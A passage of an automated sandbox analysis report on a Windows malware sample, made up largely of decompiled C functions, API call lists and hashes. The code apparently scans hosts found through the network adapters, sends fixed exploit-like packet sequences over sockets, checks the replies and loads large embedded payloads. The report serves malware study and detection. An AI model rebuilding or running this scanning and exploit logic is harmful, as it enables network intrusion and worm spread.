            • recv.WS2_32(00000000,?,00000400,00000000), ref: 00401C42
            • send.WS2_32(00000000,0042E65C,00000060,00000000), ref: 00401C72
            • recv.WS2_32(00000000,?,00000400,00000000), ref: 00401C8D
            • send.WS2_32(00000000,0042E6BC,00000052,00000000), ref: 00401CC8
            • recv.WS2_32(00000000,?,00000400,00000000), ref: 00401CE3
            • send.WS2_32(00000000,0042E6BC,00000052,00000000), ref: 00401D2C
            • recv.WS2_32(00000000,?,00000400,00000000), ref: 00401D43
            • closesocket.WS2_32(00000000), ref: 00401D4E
            • closesocket.WS2_32(00000000), ref: 00401D63
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: recvsend$closesocket$connecthtonsinet_addrsocket
            • String ID: Q
            • API String ID: 3338977835-3463352047
            • Opcode ID: 918350b7f53833d0cdbe9b3fd2039c60ef8492344bf5739ae3426028d4fc205b
            • Instruction ID: 56015dd6d43c65fb466be4e40c8692735ed6ec6497eec729d9a4b8ad7908288d
            • Opcode Fuzzy Hash: 918350b7f53833d0cdbe9b3fd2039c60ef8492344bf5739ae3426028d4fc205b
            • Instruction Fuzzy Hash: BE41F92125438064D23196395C42F9B36840F56728F944B3FF3A0B62E3D6BC990A836E
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 223 4072a0-4072f8 inet_addr htons socket 224 40746c-407477 223->224 225 4072fe-40730e connect 223->225 226 407314-407329 send 225->226 227 407466-407467 closesocket 225->227 226->227 228 40732f-407344 recv 226->228 227->224 228->227 229 40734a-40735f send 228->229 229->227 230 407365-40737a recv 229->230 230->227 231 407380-4073a9 send 230->231 231->227 232 4073af-4073c4 recv 231->232 232->227 233 4073ca-407416 send 232->233 233->227 234 407418-40742d recv 233->234 234->227 235 40742f-407434 234->235 235->227 236 407436-407463 call 406eb0 call 406ed0 call 406f50 235->236 236->227
            C-Code - Quality: 43%
            			E004072A0(short _a4, intOrPtr _a8) {
            				intOrPtr _v152;
            				void _v1023;
            				char _v1024;
            				short _v1048;
            				short _v1054;
            				char _v1068;
            				char _v1072;
            				char _v1087;
            				char _v1088;
            				char _v1104;
            				char _v1123;
            				char _v1124;
            				char _v1136;
            				char _v1145;
            				char _v1150;
            				intOrPtr _v1162;
            				intOrPtr _v1166;
            				char _v1168;
            				char _v1177;
            				intOrPtr _v1188;
            				short _t27;
            				char* _t29;
            				char _t30;
            				char _t31;
            				char* _t32;
            				void* _t34;
            				void* _t35;
            				char _t37;
            				char _t43;
            				intOrPtr _t44;
            				char _t48;
            				short _t52;
            
            				_v1024 = 0;
            				_v1048 = 2;
            				memset( &_v1023, 0, 0xff << 2);
            				asm("stosw");
            				asm("stosb");
            				_t27 = _a4;
            				_push(_t27);
            				L004097D4();
            				_v1048 = _t27;
            				_push(_a8);
            				L004097CE();
            				_push(0);
            				_push(1);
            				_push(2);
            				_v1054 = _t27;
            				L004097C8();
            				_t52 = _t27;
            				if(_t52 == 0xffffffff) {
            					L13:
            					return 0;
            				} else {
            					_push(0x10);
            					_push( &_v1068);
            					_push(_t52);
            					L004097C2();
            					if(_t27 != 0xffffffff) {
            						_push(0);
            						_push(0x89);
            						_push(0x42e544);
            						_push(_t52);
            						L004097BC();
            						if(_t27 != 0xffffffff) {
            							_push(0);
            							_t29 =  &_v1072;
            							_push(0x400);
            							_push(_t29);
            							_push(_t52);
            							L004097B6();
            							if(_t29 != 0xffffffff) {
            								_push(0);
            								_push(0x8c);
            								_push(0x42e5d0);
            								_push(_t52);
            								L004097BC();
            								if(_t29 != 0xffffffff) {
            									_push(0);
            									_push(0x400);
            									_push( &_v1104);
            									_push(_t52);
            									L004097B6();
            									if(_t29 != 0xffffffff) {
            										_t37 = _v1088;
            										_t30 = _v1087;
            										_push(0);
            										_push(0x60);
            										_push(0x42e65c);
            										_push(_t52);
            										 *0x42e67c = _t37;
            										_v1145 = _t30;
            										 *0x42e67d = _t30;
            										L004097BC();
            										if(_t30 != 0xffffffff) {
            											_push(0);
            											_push(0x400);
            											_push( &_v1136);
            											_push(_t52);
            											L004097B6();
            											if(_t30 != 0xffffffff) {
            												_t31 = _v1124;
            												_t43 = _v1123;
            												_t48 = _v1177;
            												_push(0);
            												_push(0x52);
            												_push(0x42e6bc);
            												_push(_t52);
            												 *0x42e6d8 = _t31;
            												 *0x42e6d9 = _t43;
            												 *0x42e6dc = _t37;
            												 *0x42e6dd = _t48;
            												 *0x42e72c = _t31;
            												 *0x42e72d = _t43;
            												 *0x42e730 = _t37;
            												 *0x42e731 = _t48;
            												L004097BC();
            												if(_t31 != 0xffffffff) {
            													_push(0);
            													_t32 =  &_v1168;
            													_push(0x400);
            													_push(_t32);
            													_push(_t52);
            													L004097B6();
            													if(_t32 != 0xffffffff) {
            														_t66 = _v1150 - 0x51;
            														if(_v1150 == 0x51) {
            															_t44 = _v1162;
            															_push(_t44);
            															_v1188 = _t44;
            															_t34 = E00406EB0(_v1166);
            															_t35 = E00406ED0(_v1166);
            															_push(_v152);
            															_push(_t35);
            															_push(_t34);
            															_push(_t52);
            															E00406F50(_v152, _t66);
            														}
            													}
            												}
            											}
            										}
            									}
            								}
            							}
            						}
            					}
            					_push(_t52);
            					L004097B0();
            					goto L13;
            				}
            			}

            APIs
            • inet_addr.WS2_32(?), ref: 004072CD
            • htons.WS2_32(?), ref: 004072DE
            • socket.WS2_32(00000002,00000001,00000000), ref: 004072EE
            • connect.WS2_32(00000000,00000002,00000010), ref: 00407306
            • send.WS2_32(00000000,0042E544,00000089,00000000), ref: 00407321
            • recv.WS2_32(00000000,?,00000400,00000000), ref: 0040733C
            • send.WS2_32(00000000,0042E5D0,0000008C,00000000), ref: 00407357
            • recv.WS2_32(00000000,?,00000400,00000000), ref: 00407372
            • send.WS2_32(00000000,0042E65C,00000060,00000000), ref: 004073A1
            • recv.WS2_32(00000000,?,00000400,00000000), ref: 004073BC
            • send.WS2_32(00000000,0042E6BC,00000052,00000000), ref: 0040740E
            • recv.WS2_32(00000000,?,00000400,00000000), ref: 00407425
              • Part of subcall function 00406F50: GlobalAlloc.KERNEL32(00000040,0000180C), ref: 00406FEB
            • closesocket.WS2_32(00000000), ref: 00407467
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: recvsend$AllocGlobalclosesocketconnecthtonsinet_addrsocket
            • String ID: Q
            • API String ID: 1218961698-3463352047
            • Opcode ID: cb662b63a2df382ff587a87166ed6413b15eb1a746a20c7ca240325f9c442f70
            • Instruction ID: 2e96292fb4a78f44b5b8862e346268617696c9edad98e6c8d234679fc6e9890d
            • Opcode Fuzzy Hash: cb662b63a2df382ff587a87166ed6413b15eb1a746a20c7ca240325f9c442f70
            • Instruction Fuzzy Hash: BB413A7124934069D220AB398C81F9B3A944F56724F544B3FF2A0B72D3D6B89906876F
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 243 401980-4019d7 inet_addr htons socket 244 401b56-401b60 243->244 245 4019dd-4019ed connect 243->245 246 401b50-401b51 closesocket 245->246 247 4019f3-401a05 send 245->247 246->244 247->246 248 401a0b-401a20 recv 247->248 248->246 249 401a26-401a38 send 248->249 249->246 250 401a3e-401a53 recv 249->250 250->246 251 401a59-401a88 call 4017b0 send 250->251 251->246 254 401a8e-401aa3 recv 251->254 254->246 255 401aa9-401b06 send 254->255 255->246 256 401b08-401b1d recv 255->256 256->246 257 401b1f-401b24 256->257 257->246 258 401b26-401b2b 257->258 258->246 259 401b2d-401b33 258->259 259->246 260 401b35-401b3a 259->260 260->246 261 401b3c-401b4f closesocket 260->261
            C-Code - Quality: 48%
            			E00401980(short _a4) {
            				void _v1023;
            				char _v1024;
            				void* _v1040;
            				short _v1046;
            				char _v1060;
            				char _v1072;
            				char _v1087;
            				char _v1088;
            				char _v1104;
            				char _v1117;
            				char _v1118;
            				char _v1119;
            				char _v1120;
            				char _v1123;
            				char _v1124;
            				char _v1136;
            				char _v1137;
            				char _v1138;
            				char _v1168;
            				char _v1169;
            				char _v1170;
            				char _v1172;
            				intOrPtr _v1173;
            				char _v1174;
            				char _v1175;
            				void* _t32;
            				short _t33;
            				char* _t35;
            				void* _t37;
            				char _t38;
            				char _t39;
            				char _t40;
            				char _t41;
            				char _t49;
            				short _t56;
            				short _t57;
            
            				_v1024 = 0;
            				_t32 = memset( &_v1023, 0, 0xff << 2);
            				asm("stosw");
            				asm("stosb");
            				_t56 = _a4;
            				_v1040 = 2;
            				_push(_t56);
            				L004097D4();
            				_v1040 = _t32;
            				_t33 = _a4;
            				_push(_t33);
            				L004097CE();
            				_push(0);
            				_push(1);
            				_push(2);
            				_v1046 = _t33;
            				L004097C8();
            				_t57 = _t33;
            				if(_t57 == 0xffffffff) {
            					L16:
            					__eflags = 0;
            					return 0;
            				} else {
            					_push(0x10);
            					_push( &_v1060);
            					_push(_t57);
            					L004097C2();
            					if(_t33 == 0xffffffff) {
            						L15:
            						_push(_t57);
            						L004097B0();
            						goto L16;
            					} else {
            						_push(0);
            						_push(0x58);
            						_push(0x42e3d0);
            						_push(_t57);
            						L004097BC();
            						if(_t33 == 0xffffffff) {
            							goto L15;
            						} else {
            							_push(0);
            							_push(0x400);
            							_push( &_v1072);
            							_push(_t57);
            							L004097B6();
            							if(_t33 == 0xffffffff) {
            								goto L15;
            							} else {
            								_push(0);
            								_push(0x67);
            								_push(0x42e42c);
            								_push(_t57);
            								L004097BC();
            								if(_t33 == 0xffffffff) {
            									goto L15;
            								} else {
            									_push(0);
            									_t35 =  &_v1104;
            									_push(0x400);
            									_push(_t35);
            									_push(_t57);
            									L004097B6();
            									_t66 = _t35 - 0xffffffff;
            									if(_t35 == 0xffffffff) {
            										goto L15;
            									} else {
            										_v1138 = _v1088;
            										_push( &_v1138);
            										_push(_t56);
            										_v1137 = _v1087;
            										_t37 = E004017B0(_t66);
            										_push(0);
            										_push(_t37);
            										_push(0x42e494);
            										_push(_t57);
            										L004097BC();
            										if(_t37 == 0xffffffff) {
            											goto L15;
            										} else {
            											_push(0);
            											_push(0x400);
            											_push( &_v1136);
            											_push(_t57);
            											L004097B6();
            											if(_t37 == 0xffffffff) {
            												goto L15;
            											} else {
            												_t38 = _v1124;
            												_t49 = _v1123;
            												 *0x42e510 = _t38;
            												 *0x42e512 = _t38;
            												_t39 = _v1120;
            												_v1170 = _t39;
            												 *0x42e514 = _t39;
            												_t40 = _v1119;
            												_push(0);
            												_v1169 = _t40;
            												 *0x42e515 = _t40;
            												_t41 = _v1117;
            												_push(0x4e);
            												_push(0x42e4f4);
            												_push(_t57);
            												 *0x42e511 = _t49;
            												 *0x42e513 = _t49;
            												 *0x42e516 = _v1118;
            												 *0x42e517 = _t41;
            												L004097BC();
            												if(_t41 == 0xffffffff) {
            													goto L15;
            												} else {
            													_push(0);
            													_push(0x400);
            													_push( &_v1168);
            													_push(_t57);
            													L004097B6();
            													if(_t41 == 0xffffffff || _v1175 != 5 || _v1174 != 2 || _v1173 != 0 || _v1172 != 0xc0) {
            														goto L15;
            													} else {
            														_push(_t57);
            														L004097B0();
            														return 1;
            													}
            												}
            											}
            										}
            									}
            								}
            							}
            						}
            					}
            				}
            			}

            APIs
            • inet_addr.WS2_32(?), ref: 004019AC
            • htons.WS2_32(?), ref: 004019BD
            • socket.WS2_32(00000002,00000001,00000000), ref: 004019CD
            • connect.WS2_32(00000000,00000002,00000010), ref: 004019E5
            • send.WS2_32(00000000,0042E3D0,00000058,00000000), ref: 004019FD
            • recv.WS2_32(00000000,?,00000400,00000000), ref: 00401A18
            • send.WS2_32(00000000,0042E42C,00000067,00000000), ref: 00401A30
            • recv.WS2_32(00000000,?,00000400,00000000), ref: 00401A4B
              • Part of subcall function 004017B0: sprintf.MSVCRT ref: 004017E6
            • send.WS2_32(00000000,0042E494,00000000,00000000), ref: 00401A80
            • recv.WS2_32(00000000,?,00000400,00000000), ref: 00401A9B
            • send.WS2_32(00000000,0042E4F4,0000004E,00000000), ref: 00401AFE
            • recv.WS2_32(00000000,00000000,00000400,00000000), ref: 00401B15
            • closesocket.WS2_32(00000000), ref: 00401B3D
            • closesocket.WS2_32(00000000), ref: 00401B51
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: recvsend$closesocket$connecthtonsinet_addrsocketsprintf
            • String ID:
            • API String ID: 2897817404-0
            • Opcode ID: 99f773f49429c09dd42ea4e67fbb642a1aacf232097be334d5ef740b5450ccb1
            • Instruction ID: a1df91ed12107c95754f13785544920260681e501ca594d7538f805ec802c2a0
            • Opcode Fuzzy Hash: 99f773f49429c09dd42ea4e67fbb642a1aacf232097be334d5ef740b5450ccb1
            • Instruction Fuzzy Hash: EA41FB2111938078D721A7394C41B9F7BA40F52728F540B2EF6E4772E3E3B8964A836F
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 97%
            			E00407A20() {
            				void* _v4;
            				void* _v8;
            				long _v12;
            				void* _t23;
            				void* _t24;
            				void* _t30;
            				long _t32;
            				void* _t51;
            				signed int _t52;
            				signed int _t53;
            				signed int _t59;
            				signed int _t60;
            				signed int _t66;
            				void* _t70;
            				long _t75;
            				void* _t82;
            				void* _t85;
            				long* _t88;
            
            				_t88 =  &_v12;
            				_v12 = 0;
            				_v8 = 0;
            				_v4 = 0;
            				_t23 = GlobalAlloc(0x40, 0x50d800);
            				 *0x70f864 = _t23;
            				if(_t23 != 0) {
            					_t24 = GlobalAlloc(0x40, 0x50d800);
            					 *0x70f868 = _t24;
            					if(_t24 != 0) {
            						_t66 = 0;
            						do {
            							_t82 = 0x40b020;
            							if(_t66 != 0) {
            								_t82 = 0x40f080;
            							}
            							_t70 = 0x70f864[_t66];
            							asm("sbb eax, eax");
            							 *(_t88 + 0x10 + _t66 * 4) = _t70;
            							_t52 = ( ~_t66 & 0x00008844) + 0x4060;
            							_t53 = _t52 >> 2;
            							memcpy(_t70, _t82, _t53 << 2);
            							_t30 = memcpy(_t82 + _t53 + _t53, _t82, _t52 & 0x00000003);
            							_t88 =  &(_t88[6]);
            							 *(_t88 + 0x10 + _t66 * 4) =  *(_t88 + 0x10 + _t66 * 4) + _t30;
            							_t66 = _t66 + 1;
            						} while (_t66 < 2);
            						_t51 = CreateFileA(0x70f760, 0x80000000, 1, 0, 3, 4, 0);
            						if(_t51 != 0xffffffff) {
            							_t32 = GetFileSize(_t51, 0);
            							_t85 = _v8;
            							_t75 = _t32;
            							_t18 = _t85 + 4; // 0x50d804
            							 *_t85 = _t75;
            							ReadFile(_t51, _t18, _t75,  &_v12, 0);
            							if(_v12 == _t75) {
            								_t20 = _t75 + 4; // 0x4
            								_t59 = _t20;
            								_t60 = _t59 >> 2;
            								memcpy(_v4, _t85, _t60 << 2);
            								memcpy(_t85 + _t60 + _t60, _t85, _t59 & 0x00000003);
            								CloseHandle(_t51);
            								return 1;
            							} else {
            								CloseHandle(_t51);
            								GlobalFree( *0x70f864);
            								GlobalFree( *0x70f868);
            								return 0;
            							}
            						} else {
            							GlobalFree( *0x70f864);
            							GlobalFree( *0x70f868);
            							return 0;
            						}
            					} else {
            						GlobalFree( *0x70f864);
            						return 0;
            					}
            				} else {
            					return _t23;
            				}
            			}

            APIs
            • GlobalAlloc.KERNEL32 ref: 00407A4B
            • GlobalAlloc.KERNEL32(00000040,0050D800), ref: 00407A64
            • GlobalFree.KERNEL32 ref: 00407A75
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: Global$Alloc$Free
            • String ID:
            • API String ID: 3737745340-0
            • Opcode ID: 0f0e7c931b87fc0c2fb90eaf141c425682db977e2a12490b894685d9a79f56af
            • Instruction ID: 576d902bf6cbb8a03d702eeef5b9d6f129e333ca1616e06ca5f7e1a84b8310db
            • Opcode Fuzzy Hash: 0f0e7c931b87fc0c2fb90eaf141c425682db977e2a12490b894685d9a79f56af
            • Instruction Fuzzy Hash: 7F418F72B003149BD710DF25AD45B9B37E5FBC8720F54853AEA05E32C0D67DA918CBAA
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 89%
            			E00401660(union _LARGE_INTEGER _a4, intOrPtr _a8) {
            				union _LARGE_INTEGER _v8;
            				intOrPtr _v12;
            				union _LARGE_INTEGER _v16;
            				signed int _v28;
            				long _t49;
            				intOrPtr _t56;
            				signed int _t66;
            				long _t68;
            				intOrPtr _t77;
            				long _t84;
            				signed int _t89;
            				void* _t91;
            				signed int _t94;
            				intOrPtr _t95;
            				long long _t102;
            
            				_t89 = E00409960(_a4.LowPart, _a8, 0xf4240, 0);
            				_t49 = E004098A0(_a4.LowPart, _a8, 0xf4240, 0) + _t47 * 4 + (E004098A0(_a4.LowPart, _a8, 0xf4240, 0) + _t47 * 4) * 4;
            				_t94 = _t49 + _t49 * 4 << 3;
            				_v28 = _t94;
            				if(_t89 <= 0) {
            					_t102 =  *0x431450;
            					asm("fcomp qword [0x40a188]");
            					asm("fnstsw ax");
            					__eflags = _t49 & 0x00000040;
            					if((_t49 & 0x00000040) == 0) {
            						L6:
            						asm("fild dword [esp+0x20]");
            						L00409890();
            						_a8 = _t77;
            						_t68 = (0x431bde83 * _t94 >> 0x20 >> 0x12) + (0x431bde83 * _t94 >> 0x20 >> 0x12 >> 0x1f) - 0xa;
            						QueryPerformanceCounter( &_v16);
            						_t95 = _v12;
            						_t91 = _v16.LowPart + _t49;
            						asm("adc esi, ecx");
            						__eflags = _t68;
            						if(_t68 > 0) {
            							Sleep(_t68);
            						}
            						QueryPerformanceCounter( &_a4);
            						_t56 = _a8;
            						__eflags = _t56 - _t95;
            						if(__eflags <= 0) {
            							if(__eflags < 0) {
            								L11:
            								QueryPerformanceCounter( &_a4);
            								_t56 = _a8;
            								__eflags = _t56 - _t95;
            							} else {
            								__eflags = _a4.LowPart - _t91;
            								if(_a4.LowPart < _t91) {
            									goto L11;
            									do {
            										do {
            											goto L11;
            										} while (__eflags < 0);
            										if(__eflags <= 0) {
            											goto L13;
            										}
            										goto L14;
            										L13:
            										__eflags = _a4.LowPart - _t91;
            									} while (_a4.LowPart < _t91);
            								}
            							}
            						}
            						L14:
            						return _t56;
            					} else {
            						_t49 = QueryPerformanceFrequency( &_v8);
            						__eflags = _t49;
            						if(_t49 != 0) {
            							asm("fild qword [esp+0x14]");
            							 *0x431450 = _t102;
            							goto L6;
            						} else {
            							_t84 = (0x431bde83 * _t94 >> 0x20 >> 0x12) + (0x431bde83 * _t94 >> 0x20 >> 0x12 >> 0x1f);
            							__eflags = _t84;
            							Sleep(_t84);
            							return 0x431bde83 * _t94;
            						}
            					}
            				} else {
            					_t66 = _t89 + _t89 * 4 + (_t89 + _t89 * 4) * 4;
            					Sleep((0x431bde83 * _t94 >> 0x20 >> 0x12) + (0x431bde83 * _t94 >> 0x20 >> 0x12 >> 0x1f) + (_t66 + _t66 * 4) * 8);
            					return _t66;
            				}
            			}

            APIs
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00401677
            • __allrem.LIBCMT ref: 00401687
            • Sleep.KERNEL32(?,?,?,000F4240,00000000,?,?,000F4240,00000000,?,00431480,00000000), ref: 004016BE
            • QueryPerformanceFrequency.KERNEL32(000F4240,?,?,000F4240,00000000,?,?,000F4240,00000000,?,00431480,00000000), ref: 004016E3
            • Sleep.KERNEL32(?,?,00431480,00000000), ref: 004016FF
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: Sleep$FrequencyPerformanceQueryUnothrow_t@std@@@__allrem__ehfuncinfo$??2@
            • String ID:
            • API String ID: 1865988196-0
            • Opcode ID: 5e4d94bea77e2ed6b07bd592e4679988c21404304d6631d8ddc961a09a62db50
            • Instruction ID: ca8a84c6aee2b709c623a849754ad144badd5e8b4fc1d996b6a0b75b13124809
            • Opcode Fuzzy Hash: 5e4d94bea77e2ed6b07bd592e4679988c21404304d6631d8ddc961a09a62db50
            • Instruction Fuzzy Hash: 0731D4362003058BC310DF19DD859AA77A9FFC4304F84092EF585BB2A2D739E918C799
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 58%
            			E00407720() {
            				char _v4;
            				intOrPtr _v12;
            				signed int _v16;
            				signed int _v20;
            				signed int _v24;
            				char _v28;
            				signed int _v32;
            				signed int _v36;
            				signed int _v40;
            				char _v44;
            				char _v45;
            				intOrPtr _t30;
            				void* _t32;
            				signed int _t51;
            				signed int _t54;
            				void* _t57;
            				intOrPtr* _t59;
            				intOrPtr _t61;
            				void* _t63;
            
            				_push(0xffffffff);
            				_push(E00409BC0);
            				_push( *[fs:0x0]);
            				 *[fs:0x0] = _t61;
            				_t54 = 0;
            				_v28 = _v45;
            				_v24 = 0;
            				_v20 = 0;
            				_v16 = 0;
            				_v4 = 0;
            				_v44 = _v45;
            				_v40 = 0;
            				_v36 = 0;
            				_v32 = 0;
            				_push( &_v44);
            				_push( &_v28);
            				_v4 = 1;
            				E00409160();
            				_t59 = __imp___beginthreadex;
            				_t63 = _t61 - 0x24 + 8;
            				_t51 = 0;
            				while(1) {
            					_t30 = _v24;
            					if(_t30 == _t54 || _t51 >= _v20 - _t30 >> 2) {
            						break;
            					}
            					if( *0x70f86c > 0xa) {
            						do {
            							Sleep(0x64);
            						} while ( *0x70f86c > 0xa);
            						_t30 = _v24;
            					}
            					_t57 =  *_t59(0, 0, E004076B0,  *((intOrPtr*)(_t30 + _t51 * 4)), 0, 0);
            					_t63 = _t63 + 0x18;
            					if(_t57 != 0) {
            						InterlockedIncrement(0x70f86c);
            						CloseHandle(_t57);
            					}
            					Sleep(0x32);
            					_t51 = _t51 + 1;
            					_t54 = 0;
            				}
            				__imp___endthreadex(_t54);
            				_t32 = E004097FE(_v40, _v40);
            				_v40 = _t54;
            				_v36 = _t54;
            				_v32 = _t54;
            				E004097FE(_t32, _v24);
            				 *[fs:0x0] = _v12;
            				return 0;
            			}

            APIs
              • Part of subcall function 00409160: GetAdaptersInfo.IPHLPAPI ref: 00409173
              • Part of subcall function 00409160: LocalAlloc.KERNEL32(00000000,00000000,00000000,?), ref: 00409188
              • Part of subcall function 00409160: GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 0040919E
              • Part of subcall function 00409160: LocalFree.KERNEL32(00000000,00000000,?), ref: 004091A8
            • Sleep.KERNEL32(00000064), ref: 004077B5
            • _beginthreadex.MSVCRT ref: 004077D4
            • InterlockedIncrement.KERNEL32(0070F86C), ref: 004077E4
            • CloseHandle.KERNEL32(00000000), ref: 004077EB
            • Sleep.KERNEL32(00000032), ref: 004077F3
            • _endthreadex.MSVCRT(00000000), ref: 004077FB
            Memory Dump Source
            • Source File: 00000001.00000002.265562252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.265557684.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265568782.000000000040A000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265593246.000000000040B000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265600976.000000000040F000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265685545.0000000000431000.00000004.00000001.01000000.00000005.sdmp
            • Associated: 00000001.00000002.265724046.0000000000710000.00000002.00000001.01000000.00000005.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_1_2_400000_THN6clTA6P.jbxd
            Yara matches
            Similarity
            • API ID: AdaptersInfoLocalSleep$AllocCloseFreeHandleIncrementInterlocked_beginthreadex_endthreadex
            • String ID:
            • API String ID: 3699243544-0
            • Opcode ID: e9713544c1ab7fc6fe7d11ad933d691a78c98f2c71b545826b9e0ee993b31d38
            • Instruction ID: 036364e59514726501199075794a4ec7e741377dc520afbe60009fae6dc53544
            • Opcode Fuzzy Hash: e9713544c1ab7fc6fe7d11ad933d691a78c98f2c71b545826b9e0ee993b31d38
            • Instruction Fuzzy Hash: 4731C6759083509FC310DF29DD41B1FBBE4EB89B14F044A2EF589A7391C678A905CB9B
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • inet_ntoa.WS2_32(?), ref: 00407567
            • strncpy.MSVCRT ref: 00407572
              • Part of subcall function 00401980: inet_addr.WS2_32(?), ref: 004019AC
              • Part of subcall function 00401980: htons.WS2_32(?), ref: 004019BD
              • Part of subcall function 00401980: socket.WS2_32(00000002,00000001,00000000), ref: 004019CD
              • Part of subcall function 00401980: connect.WS2_32(00000000,00000002,00000010), ref: 004019E5
              • Part of subcall function 00401980: send.WS2_32(00000000,0042E3D0,00000058,00000000), ref: 004019FD
              • Part of subcall function 00401980: recv.WS2_32(00000000,?,00000400,00000000), ref: 00401A18
              • Part of subcall function 00401980: send.WS2_32(00000000,0042E42C,00000067,00000000), ref: 00401A30
              • Part of subcall function 00401980: recv.WS2_32(00000000,?,00000400,00000000), ref: 00401A4B
              • Part of subcall function 00401980: send.WS2_32(00000000,0042E494,00000000,00000000), ref: 00401A80
              • Part of subcall function 00401980: recv.WS2_32(00000000,?,00000400,00000000), ref: 00401A9B
            • Sleep.KERNEL32(00000BB8), ref: 004075BA
              • Part of subcall function 00401370: GetTickCount.KERNEL32 ref: 00401398
              • Part of subcall function 00401370: GetTickCount.KERNEL32 ref: 004013DC
              • Part of subcall function 00401370: _ftol.MSVCRT ref: 00401405
              • Part of subcall function 00401370: GetTickCount.KERNEL32 ref: 00401418
              • Part of subcall function 00401370: inet_addr.WS2_32(?), ref: 00401440
              • Part of subcall function 00401370: htons.WS2_32(?), ref: 00401451
              • Part of subcall function 00401370: socket.WS2_32(00000002,00000001,00000000), ref: 00401460
              • Part of subcall function 00401370: connect.WS2_32(00000000,?,00000010), ref: 00401478
            • Sleep.KERNEL32(00000BB8), ref: 0040759B
